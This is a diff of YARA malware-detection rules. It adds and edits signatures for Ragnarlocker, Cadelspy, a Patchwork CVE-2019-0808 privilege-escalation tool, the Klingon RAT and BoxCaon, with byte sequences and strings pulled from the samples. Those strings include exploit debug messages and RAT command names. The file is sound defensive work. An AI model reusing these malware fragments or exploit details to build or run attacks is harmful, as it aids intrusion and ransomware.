+		$s2 = { 48 83 ec 70 48 89 6c 24 68 48 8d 6c 24 68 48 c7 44 24 30 00 00 00 00 48 c7 44 24 28 00 00 00 00 48 8b 05 bf dc 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 28 48 89 44 24 18 e8 39 17 00 00 48 83 7c 24 20 00 74 35 31 c0 31 c9 eb 24 48 89 ca 48 89 c1 bb 01 00 00 00 48 d3 e3 48 23 5c 24 30 48 8d 72 01 48 85 db 48 0f 45 d6 48 ff c0 48 89 d1 48 83 f8 40 7c d6 48 85 c9 75 3e 0f 57 c0 0f 11 44 24 38 0f 11 44 24 48 0f 11 44 24 58 48 8b 05 23 dc 90 00 48 89 04 24 48 8d 44 24 38 48 89 44 24 08 e8 10 16 00 00 8b 44 24 58 89 44 24 78 48 8b 6c 24 68 48 83 c4 70 c3 89 4c 24 78 48 8b 6c 24 68 48 }
+		$s3 = { 48 8b 05 60 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 02 07 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 10 03 00 00 48 85 c0 0f 84 80 00 00 00 48 8b 05 29 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 cb 06 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 18 03 00 00 48 85 c0 74 0a 48 8b 6c 24 30 48 83 c4 38 c3 48 8d 05 ac e0 56 00 48 89 04 24 e8 1b b6 02 00 48 8b 05 e4 cb 90 00 48 8b 4c 24 40 48 8b 91 10 03 00 00 48 89 04 24 48 89 54 24 08 e8 5a 05 00 00 48 8b 44 24 40 48 c7 80 10 03 00 00 00 00 00 00 eb b3 48 8d 05 61 e0 56 00 48 89 04 24 e8 d8 b5 02 00 e9 6b ff ff ff 48 8b 6c 24 30 48 83 c4 38 }
+		$s4 = { 48 81 ec a0 00 00 00 48 89 ac 24 98 00 00 00 48 8d ac 24 98 00 00 00 48 c7 44 24 48 00 00 00 00 48 8b 05 8a c9 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 c7 44 24 10 fe ff ff ff 48 c7 44 24 18 ff ff ff ff 48 8d 44 24 48 48 89 44 24 20 0f 57 c0 0f 11 44 24 28 48 c7 44 24 38 02 00 00 00 e8 3b 05 00 00 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 48 8b 40 30 48 8b 4c 24 48 48 87 88 78 02 00 00 0f 57 c0 0f 11 44 24 68 0f 11 44 24 78 0f 11 84 24 88 00 00 00 48 8b 05 5f c8 90 00 48 89 04 24 48 8d 44 24 68 48 89 44 24 08 48 8d 44 24 68 48 89 44 24 10 48 c7 44 24 18 30 00 00 00 e8 59 03 00 00 48 83 7c 24 20 }
+		$s5 = { 48 8b 15 26 29 92 00 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 48 c7 44 24 18 00 10 00 00 48 c7 44 24 20 04 00 00 00 e8 71 64 01 00 48 83 7c 24 28 00 40 0f 94 c6 48 8b 44 24 38 48 8b 4c 24 48 48 8b 54 24 68 48 8b 5c 24 40 e9 61 ff ff ff 48 8b 6c 24 50 48 83 c4 58 c3 48 8b 6c 24 50 48 83 c4 58 c3 e8 25 91 01 00 48 8d 05 e2 b8 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 bc 9a 01 00 48 8b 44 24 38 48 89 04 24 e8 be 97 01 00 48 8d 05 9a b1 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 95 9a 01 00 8b 44 24 34 48 89 04 24 e8 98 97 01 00 e8 73 93 01 00 e8 5e 91 01 00 48 8d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 2 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_Loader_Buer_Nov_2020_1 : FILE
+
+rule ARKBIRD_SOLG_Ransom_Ragnarlocker_July_2020_1 : FILE
 {
 	meta:
-		description = "Detect Buer loader"
+		description = "Detect Ragnarlocker by strings (July 2020)"
 		author = "Arkbird_SOLG"
-		id = "a2883eca-d576-53ba-aa97-5e3c94f501a5"
-		date = "2020-12-01"
-		modified = "2020-12-01"
-		reference = "https://twitter.com/James_inthe_box/status/1333551419735953409"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-01/Buer/Mal_Buer_Nov_2020_1.yar#L35-L64"
+		id = "9291ed33-8d7d-5b88-9075-b847fdbab179"
+		date = "2020-07-30"
+		modified = "2020-07-30"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-30/Yara_Ransom_Ragnarlocker_July_2020_1.yar#L3-L34"
 		license_url = "N/A"
-		logic_hash = "96a74b497076be170ce6138189501d8b3a1002bcf07f9d3cf662d64612d04a59"
+		logic_hash = "73d3be9a2d3b315ed6d3d93e2c6f9988d60234530b0398e8949c511f919a8954"
 		score = 75
-		quality = 55
+		quality = 23
 		tags = "FILE"
-		hash1 = "2824d4b0e5a502416696b189bd840870a19dfd555b53535f20b0c87c95f4c232"
-		hash2 = "a98abbce5e84c4c3b67b7af3f9b4dc9704b5af33b6183fb3c192e26b1e0ca005"
-		hash3 = "ae3ac27e8303519cf04a053a424a0939ecc3905a9a62f33bae3a29f069251b1f"
+		hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87"
 
 	strings:
-		$s1 = "bcdfghklmnpqrstvwxz" fullword ascii
-		$s2 = "%02x" fullword wide
-		$s3 = "{%s-%d-%d}" fullword wide
-		$s4 = "update" fullword wide
-		$s5 = "]otju}y&Ykx|kx&867?5Ykx|kx&867<" fullword ascii
-		$s6 = "]otju}y&Ykx|kx&8678&X8" fullword ascii
-		$s7 = "]otju}y&\\oyzg5Ykx|kx&857>" fullword ascii
-		$s8 = "]otju}y&>47" fullword ascii
-		$s9 = "]otju}y&Ykx|kx&8678" fullword ascii
-		$s10 = "]otju}y&=" fullword ascii
-		$s11 = "Iutzktz3Z" fullword ascii
-		$s12 = "g|mnuuq~4jrr" fullword ascii
-		$s13 = "RegularModules" fullword ascii
-		$s14 = "]otju}y&>" fullword ascii
+		$f1 = "bootfont.bin" fullword wide
+		$f2 = "bootmgr.efi" fullword wide
+		$f3 = "bootsect.bak" fullword wide
+		$r1 = "$!.txt" fullword wide
+		$r2 = "---BEGIN KEY R_R---" fullword ascii
+		$r3 = "!$R4GN4R_" fullword wide
+		$r4 = "RAGNRPW" fullword ascii
+		$r5 = "---END KEY R_R---" fullword ascii
+		$a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii
+		$a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
+		$a3 = "WinSta0\\Default" fullword wide
+		$a4 = "%s-%s-%s-%s-%s" fullword wide
+		$a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide
+		$c1 = "-backup" fullword wide
+		$c2 = "-force" fullword wide
+		$c3 = "-vmback" fullword wide
+		$c4 = "-list" fullword wide
+		$s1 = ".ragn@r_" fullword wide
+		$s2 = "\\notepad.exe" fullword wide
+		$s3 = "Opera Software" fullword wide
+		$s4 = "Tor browser" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 8 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "2c2aab89a4cba444cf2729e2ed61ed4f" and ( ( 2 of ( $f* ) ) and ( 3 of ( $r* ) ) and ( 4 of ( $a* ) ) and ( 2 of ( $c* ) ) and ( 2 of ( $s* ) ) ) )
 }
-rule ARKBIRD_SOLG_RAN_Crylock_July_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Cadelspy_Stealer_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect CryLock ransomware (ex-Cryakl)"
+		description = "Detect Cadelspy stealer"
 		author = "Arkbird_SOLG"
-		id = "350bd622-f4b5-5837-a239-dc506b100aef"
-		date = "2021-07-17"
-		modified = "2021-07-17"
-		reference = "https://twitter.com/BushidoToken/status/1415958829318217730"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-16/Crylock/RAN_Crylock_July_2021_1.yara#L1-L23"
+		id = "bac23ed9-f51c-546e-8f4e-320d33b51829"
+		date = "2021-05-30"
+		modified = "2021-06-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-30/APT39/MAL_Cadelspy_Stealer_May_2021_1.yara#L1-L24"
 		license_url = "N/A"
-		logic_hash = "4f5046a64e7491085a55d8d1f2b5b056dc0aa89fcdea47652ecb7db680de2f59"
+		logic_hash = "29fade3703c55bd16e67f9bf126cb0d8a06bc0eafe10e145f8d57d8c4abe5656"
 		score = 75
-		quality = 65
+		quality = 75
 		tags = "FILE"
-		hash1 = "a962501ea4cd363dd588c948ff8b0ab24aa4132ff58f4a7806af06efa3b791ef"
-		hash2 = "1c2975dd464d014502a46ba6383943c7de4635e3664011653217dc424d53f8fe"
-		hash3 = "e001f6a5b2d4d2659b010fb5825eb4383e8f415861a244329bc70cfcd18da507"
+		hash1 = "8847a73bbd9477be60685ce8ec8333db933892f4d7b729fcef01ac76600de9ff"
+		hash2 = "f3b0ad96c8529399bd7117bd67cdf0297191476d3a81a60b147960306ae5f068"
+		hash3 = "88c947d0d0fddd1ea87f5b85982cf231c9c56e4f5e25fac405f608a1c28d8391"
 		tlp = "White"
-		adversary = "RAAS"
+		adversary = "APT39"
 
 	strings:
-		$s1 = { 2f 63 20 22 70 69 6e 67 20 30 2e 30 2e 30 2e 30 26 64 65 6c 20 22 }
-		$s2 = { 7b 45 4e 43 52 59 50 54 53 54 41 52 54 7d 7b }
-		$s3 = { 7b 45 4e 43 52 59 50 54 45 4e 44 45 44 7d }
-		$s4 = { 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 45 58 54 45 4e 41 54 49 4f 4e 53 5c 5c 5c 00 ff ff ff ff 17 00 00 00 2f 2f 2f 45 4e 44 20 43 4f 4d 4d 41 4e 44 53 20 4c 49 53 54 5c 5c 5c 00 ff ff ff ff 1d 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 4b 49 4c 4c 20 4c 49 53 54 5c 5c 5c 00 00 00 ff ff ff ff 1c 00 00 00 2f 2f 2f 45 4e 44 20 53 45 52 56 49 43 45 53 20 53 54 4f 50 20 4c 49 53 54 5c 5c 5c 00 00 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 57 48 49 54 45 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 49 4c 45 53 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 20 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 4f 4c 44 45 52 53 20 4c 49 53 54 5c 5c 5c }
-		$s5 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 }
-		$s6 = { 3c 25 55 4e 44 45 43 52 59 50 54 5f 44 41 54 45 54 49 4d 45 25 3e }
-		$s7 = { 25 00 73 00 20 00 28 00 25 00 73 00 2c 00 20 00 6c 00 69 00 6e 00 65 00 20 00 25 00 64 00 29 }
+		$str1 = "C:\\Windows\\SysEvent.exe" fullword wide
+		$str2 = "\\sysprep\\sysprep.exe" fullword wide
+		$str3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
+		$str4 = "@C:\\Windows\\systemw.dll" fullword wide
+		$str5 = "systemw.dll" fullword ascii
+		$str6 = "ApAshell32.dll" fullword wide
+		$seq1 = { 55 8b ec 83 ec 14 a1 04 00 41 00 33 c5 89 45 fc 8d 45 f8 c7 45 f0 00 00 00 00 50 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 68 20 02 00 00 6a 20 6a 02 8d 45 f0 66 c7 45 f4 00 05 50 ff 15 08 30 40 00 85 c0 74 25 8d 45 ec 50 ff 75 f8 6a 00 ff 15 04 30 40 00 ff 75 f8 f7 d8 1b c0 21 45 ec ff 15 00 30 40 00 83 7d ec 00 75 05 e8 52 fd ff ff 56 68 2d 02 00 00 ff 15 30 30 40 00 68 1c 33 40 00 ff 15 20 30 40 00 6a 00 6a 00 6a 01 6a 00 6a 00 6a 02 68 1c 33 40 00 89 45 f8 ff 15 1c 30 40 00 6a 00 8b f0 8d 45 f8 50 68 00 ba 00 00 68 68 33 40 00 56 ff 15 6c 30 40 00 56 ff 15 74 30 40 00 6a 01 6a 00 6a 00 68 1c 33 40 00 68 4c 33 40 00 6a 00 ff 15 b0 30 40 00 8b 4d fc 33 c0 33 cd 5e e8 06 00 00 00 }
+		$seq2 = { 8b 0d 10 32 40 00 0f 10 05 24 32 40 00 89 08 8b 0d 14 32 40 00 89 48 04 8b 0d 18 32 40 00 89 48 08 8b 0d 1c 32 40 00 89 48 0c 66 8b 0d 20 32 40 00 66 89 48 10 33 c9 a1 3c 32 40 00 0f 11 84 24 34 04 00 00 89 84 24 4c 04 00 00 f3 0f 7e 05 34 32 40 00 66 0f d6 84 24 44 04 00 00 0f 1f 40 00 0f b7 84 0c c8 0f 00 00 8d 49 02 66 89 84 0c 42 08 00 00 66 85 c0 75 e8 8d bc 24 44 08 00 00 83 c7 fe 66 8b 47 02 83 c7 02 66 85 c0 75 f4 b9 0a 00 00 00 be 40 32 40 00 f3 a5 b9 21 00 00 00 0f 10 05 58 33 40 00 66 a5 8d bc 24 54 0c 00 00 be 70 32 40 00 f3 a5 66 a5 0f 11 84 24 5c 0e 00 00 0f 10 05 78 ed 40 00 0f 11 84 24 6c 0e 00 00 0f 10 05 68 ed 40 00 0f 11 84 24 7c 0e 00 00 38 45 08 75 1f 8d 44 24 10 50 e8 23 fa ff ff 5f 5e 5b 8b 8c 24 c8 11 00 00 33 cc e8 1c 04 00 00 8b }
+		$seq3 = { 8b 84 b5 e4 d9 ff ff 85 c0 74 66 50 6a 00 68 ff ff 1f 00 ff 15 28 30 40 00 8b f8 85 ff 74 52 8d 85 dc d9 ff ff 50 6a 04 8d 85 d0 d9 ff ff 50 57 ff 15 64 30 40 00 85 c0 74 32 68 04 01 00 00 8d 85 ec fb ff ff 50 ff b5 d0 d9 ff ff 57 ff 15 34 30 40 00 8d 85 ec fb ff ff 68 f8 32 40 00 50 ff 15 38 31 40 00 83 c4 08 85 c0 74 21 57 ff d3 33 ff 8b 85 e0 d9 ff ff 46 c1 e8 02 8b cf 3b f0 0f 82 7b ff ff ff 85 c9 0f 84 43 01 00 00 68 04 01 00 00 8d 85 e4 f9 ff ff 50 6a 00 ff 15 3c 30 40 00 85 c0 0f 84 24 01 00 00 8d 85 f4 fd ff ff 50 68 04 01 00 00 ff 15 14 30 40 00 8d 85 f4 fd ff ff 50 6a 00 68 14 33 40 00 50 ff 15 60 30 40 00 6a 00 8d 85 f4 fd ff ff 50 8d 85 e4 f9 ff ff 50 ff 15 58 30 40 00 85 c0 0f 84 df 00 00 00 6a 00 6a 00 6a 03 6a 00 6a 00 68 00 00 00 c0 8d 85 f4 fd ff ff 50 ff 15 1c 30 40 00 8b f0 83 fe ff 0f 84 b8 00 00 00 6a 00 8d 85 d8 d9 ff ff 50 68 00 10 00 00 8d 85 e4 e9 ff ff 50 56 ff 15 78 30 40 00 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $str* ) and 2 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Emotet_Nov_2021_1 : FILE
+
+rule ARKBIRD_SOLG_APT_Patchwork_Tool_CVE_2019_0808_1 : FILE
 {
 	meta:
-		description = "Detect Emotet loader"
+		description = "Detect CVE 2019-0808 tool used by Patchwork group"
 		author = "Arkbird_SOLG"
-		id = "ad67c735-7ed9-5440-b693-55dce9840f56"
-		date = "2021-11-15"
-		modified = "2021-11-16"
-		reference = "https://cyber.wtf/2021/11/15/guess-whos-back/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-16/MAL_Emotet_Nov_2021_1.yara#L1-L19"
+		id = "169255fe-dd7a-5a4e-8f0f-d84a0cf5c684"
+		date = "2020-08-27"
+		modified = "2021-07-13"
+		reference = "https://blog.exodusintel.com/2019/05/17/windows-within-windows/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-27/APT_Patchwork_Tool_CVE_2019_0808_1.yar#L3-L34"
 		license_url = "N/A"
-		logic_hash = "9ae3cbf863fdf3addd7ec00b4d6b55024c3159156518ef15fff79f5a92988297"
+		logic_hash = "e66df5d69d64c00cb68ff7bea0f7a7eec6657aff83d0f6cdb48d908bae8bcec8"
+		score = 50
+		quality = 75
+		tags = "FILE"
+		hash1 = "49f8a9203e5055777a67490923243405b9aa519016645fd75731c53cbf02073c"
+		level = "Experimental"
+
+	strings:
+		$asm1 = { 8b 3d 44 21 01 10 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 e4 7e 01 10 68 e8 7e 01 10 6a 00 ff d7 50 68 f0 7e 01 10 a3 c8 a2 01 10 e8 e8 f7 ff ff 8b 35 68 21 01 10 8d 84 24 5c 01 00 00 83 c4 08 c7 84 24 54 01 00 00 1c 00 00 00 0f 57 c0 c7 84 24 58 01 00 00 10 00 00 00 66 0f 13 84 24 60 01 00 00 66 0f 13 84 24 68 01 00 00 50 ff b4 24 1c 01 00 00 c7 84 24 64 01 00 00 00 00 00 60 ff d6 8d 84 24 54 01 00 00 50 ff 74 24 10 ff d6 8b 35 5c 21 01 10 68 04 7f 01 10 ff 74 24 10 68 10 04 00 00 ff b4 24 24 01 00 00 ff }
+		$asm2 = { a1 14 21 01 10 0f 57 c0 8b 74 24 08 89 84 24 28 01 00 00 8d 84 24 20 01 00 00 50 c7 84 24 28 01 00 00 00 00 00 00 66 0f 13 84 24 3c 01 00 00 c7 84 24 44 01 00 00 00 00 00 00 c7 84 24 50 01 00 00 00 00 00 00 c7 84 24 24 01 00 00 30 00 00 00 c7 84 24 30 01 00 00 00 00 00 00 c7 84 24 34 01 00 00 00 00 00 00 89 b4 24 38 01 00 00 c7 84 24 48 01 00 00 00 00 00 00 c7 84 24 4c 01 00 00 10 7f 01 10 ff 15 64 21 01 10 6a 00 56 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 20 7f 01 10 68 10 7f 01 10 6a 00 ff d7 6a 00 50 6a 00 6a 00 a3 ec a2 01 10 6a 00 ff b4 24 2c 01 00 00 ff 15 58 21 01 }
+		$asm3 = { e8 72 fb ff ff 83 c4 08 68 c0 13 00 10 6a fc ff 76 0c ff 15 54 21 01 10 56 ff 75 0c ff 75 08 6a 00 ff 15 24 21 01 10 5f 5e 5b 5d }
+		$s1 = "[*] Successfully exploited CVE-2019-0808 and triggered the shellcode!" fullword ascii
+		$s2 = "[!] Failed to find the address of IsMenu within user32.dll." fullword ascii
+		$s3 = "Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM." fullword ascii
+		$s4 = "AppPolicyGetProcessTerminationMethod" fullword ascii
+		$s5 = "[*] Found target windows!" fullword ascii
+		$s6 = "[*] addressOfIsMenuFromStartOfUser32: 0x%08X" fullword ascii
+		$s7 = "[*] FakeMenu: %p" fullword ascii
+		$s8 = "[*] Primary window address: 0x%08X" fullword ascii
+		$s9 = "[!] Didn't exploit the program. For some reason our privileges were not appropriate." fullword ascii
+		$s10 = "[*] hUser32: 0x%08X" fullword ascii
+		$s11 = "[*] Secondary window address: 0x%08X" fullword ascii
+		$s12 = "[*] Offset: 0x%08X" fullword ascii
+		$s13 = "[*] pHmValidateHandle: 0x%08X" fullword ascii
+		$s14 = "[*] HWND: %p " fullword ascii
+		$s15 = "[*] pIsMenuFunction: 0x%08X" fullword ascii
+		$s16 = "[*] Destroyed spare windows!" fullword ascii
+		$s17 = "[!] SetWindowLongA malicious error: 0x%08X" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 70KB and ( pe.imphash ( ) == "d4a5e8c255211639195793920eeda70f" and 2 of ( $asm* ) and 12 of ( $s* ) )
+}
+rule ARKBIRD_SOLG_MAL_Klingon_Jun_2021_1 : FILE
+{
+	meta:
+		description = "Detect the Klingon RAT"
+		author = "Arkbird_SOLG"
+		id = "bf114c4d-3010-5b34-954e-82794e30edcb"
+		date = "2021-06-19"
+		modified = "2021-06-21"
+		reference = "https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-20/Klingon/MAL_Klingon_Jun_2021_1.yara#L1-L18"
+		license_url = "N/A"
+		logic_hash = "283452d24edea988dc353fada4cd1e050db244a48cc6ab30f70e1900ca9c7c2f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "0865bd192e226da2c40b8bdd33a65ef41ca255a0031b3b36ab6a657ba6675d5e"
-		hash2 = "14613fa0b6eea4cd9205ffbe1c462178c94298707d19f78a27eec3dece8765f0"
-		tlp = "white"
-		adversary = "TrickBot Gang"
+		hash1 = "44237e2de44a533751c0baace09cf83293572ae7c51cb4575e7267be289c6611"
+		hash2 = "c98bb0649262277ec9dd16cf27f8b06042ff552535995f2bdd3355d2adeff801"
+		hash3 = "e8eea442e148c81f116de31b4fc3d0aa725c5dbbbd840b446a3fb9793d0b9f26"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = { 8b 4d 08 0f b6 02 0f b6 31 2b f0 75 18 0f b6 71 01 0f b6 42 01 2b f0 75 0c 0f b6 71 02 0f b6 42 02 2b f0 74 10 33 c9 85 f6 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 49 03 0f b6 42 03 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 8b c1 eb 56 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 0c 0f b6 51 01 0f b6 46 01 2b d0 74 06 33 c9 85 d2 eb b4 0f b6 49 02 0f b6 46 02 eb be 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 e0 0f b6 49 01 0f b6 46 01 eb a4 8b 45 08 0f b6 08 8b 45 0c 0f b6 00 eb 96 33 c0 5e 5b 5d c3 8b ff }
-		$s2 = { 8b 75 10 83 e0 3f 8b 5d 18 6b c8 38 c1 fa 06 89 75 a0 89 5d c4 89 55 b0 8b 04 95 [2] 03 10 89 4d bc 8b 44 08 18 89 45 9c 8b 45 14 03 c6 89 45 ac ff 15 ?? 40 03 10 80 7b 14 00 89 45 90 75 07 8b cb e8 [2] ff ff 8b 43 0c 8b 75 08 8b fe 8b 40 08 89 45 98 33 c0 ab ab ab 8b 45 a0 8b d0 89 55 d0 3b 45 ac 0f 83 14 03 00 00 8b 7d bc 33 db 89 5d b8 81 7d 98 e9 fd 00 00 8a 02 88 45 cf 8b 45 b0 89 5d c0 c7 45 d4 01 00 00 00 8b 0c 85 }
-		$s3 = { 53 53 40 6a 05 89 45 d0 8d 45 d8 50 ff 75 d4 8d 45 c0 50 53 ff 75 90 e8 [2] ff ff 83 c4 20 89 45 c8 85 c0 0f 84 00 01 00 00 53 8d 4d a4 51 50 8d 45 d8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 dd 00 00 00 8b 55 d0 8b ca 2b 4d a0 8b 46 08 03 c1 89 45 b8 89 46 04 8b 45 c8 39 45 a4 0f 82 c6 00 00 00 80 7d cf 0a 75 3c 6a 0d 58 53 66 89 45 a8 8d 45 a4 50 6a 01 8d 45 a8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 95 00 00 00 83 7d a4 01 0f 82 93 00 00 00 ff 46 08 ff 46 04 8b 46 04 8b 55 d0 89 45 b8 3b 55 ac 0f 82 6f fd ff ff eb 79 85 }
-		$s4 = { ba 08 00 00 00 c1 e2 00 8b 45 f0 8b 4c 10 78 03 4d fc 89 4d f8 ba 08 00 00 00 6b c2 0c 8b 4d f0 83 7c 01 78 00 74 09 c7 45 e8 0c 00 00 00 eb 07 c7 45 e8 01 00 00 00 8b 55 e8 89 55 e4 8b 45 e4 8b 4d f0 8b 54 c1 78 89 55 dc 8b 45 e4 8b 4d f0 8b 54 c1 7c 89 55 d8 8b 45 dc 03 45 fc 89 45 d4 8d 4d c8 51 6a 04 8b 55 d8 52 8b 45 d4 50 ff 15 04 40 03 10 8b 4d f8 83 79 0c 00 0f 84 cf }
-		$s5 = { 83 20 00 33 c9 21 4d e8 53 8b 5d 08 57 33 ff 89 4d e4 89 7d e0 8b 03 85 c0 74 56 8d 4d fc 66 c7 45 fc 2a 3f 51 50 c6 45 fe 00 e8 12 55 00 00 59 59 85 c0 75 1a 8d 45 e0 50 33 c0 50 50 ff 33 e8 13 01 00 00 8b f0 83 c4 10 85 f6 75 74 eb 13 8d 4d e0 51 50 ff 33 e8 ad 01 00 00 83 c4 0c 85 c0 75 1d 83 c3 04 8b 03 }
+		$seq1 = { 81 3a 70 72 6f 78 0f 85 [2] 00 00 80 7a 04 79 0f 84 [2] 00 00 48 83 f9 05 75 12 81 3a 73 68 65 6c 75 0a 80 7a 04 6c 0f 84 [2] 00 00 48 83 f9 06 75 14 81 3a 62 69 6e 61 75 0c 66 81 7a 04 72 79 0f 84 [2] 00 00 48 83 f9 03 0f 85 ?? 04 00 00 66 81 3a 63 6d 0f 85 [2] 00 00 80 7a 02 64 0f 84 [2] 00 00 48 83 f9 06 }
+		$seq2 = { 48 8d 05 [3] 00 48 89 ?? 24 [1-4] 48 c7 84 24 ?? 00 00 00 ?? 00 00 00 48 8d 0d [3] 00 48 89 ?? 24 [0-4] 48 c7 ?? 24 }
+		$seq3 = { 48 8d 0d [3] 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 89 84 24 ?? 00 00 00 48 8d 05 [3] 00 48 89 04 24 48 c7 44 24 08 08 00 00 00 48 8d 84 24 ?? 00 00 00 48 89 44 24 10 48 c7 44 24 18 03 00 00 00 48 c7 44 24 20 03 00 00 00 e8 [3] ff 48 8b 44 24 30 48 89 44 24 58 48 8b 4c 24 28 48 89 8c 24 ?? 00 00 00 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and all of ( $seq* )
+}
+rule ARKBIRD_SOLG_Mal_Boxcaon_Jul_2021_1 : FILE
+{
+	meta:
+		description = "Detect the BoxCaon malware"
+		author = "Arkbird_SOLG"
+		id = "5f456b73-02f9-5dd7-973e-bde20dcddd27"
+		date = "2021-07-01"
+		modified = "2021-07-02"
+		reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_BoxCaon_Jul_2021_1.yara#L1-L22"
+		license_url = "N/A"
+		logic_hash = "c7dfce8d7a451817a80897d5cb02cec5aba52f86ece0286353865b7d391e2ffc"
+		score = 75
+		quality = 46
+		tags = "FILE"
+		hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b"
+		hash2 = "d0b88ab321a05fc94505620c9d02baec4cb1de7bb3b0067de4f8c0d3ba8548b2"
+		tlp = "White"
+		adversary = "IndigoZebra"
+
+	strings:
+		$s1 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 61 75 74 6f 72 65 6e 61 6d 65 22 3a 20 66 61 6c 73 65 7d }
+		$s2 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 72 65 63 75 72 73 69 76 65 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 65 64 69 61 5f 69 6e 66 6f 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 64 65 6c 65 74 65 64 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 68 61 73 5f 65 78 70 6c 69 63 69 74 5f 73 68 61 72 65 64 5f 6d 65 6d 62 65 72 73 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 6f 75 6e 74 65 64 5f 66 6f 6c 64 65 72 73 22 3a 20 74 72 75 65 2c 22 69 6e 63 6c 75 64 65 5f 6e 6f 6e 5f 64 6f 77 6e 6c 6f 61 64 61 62 6c 65 5f 66 69 6c 65 73 22 3a 20 74 72 75 65 7d }
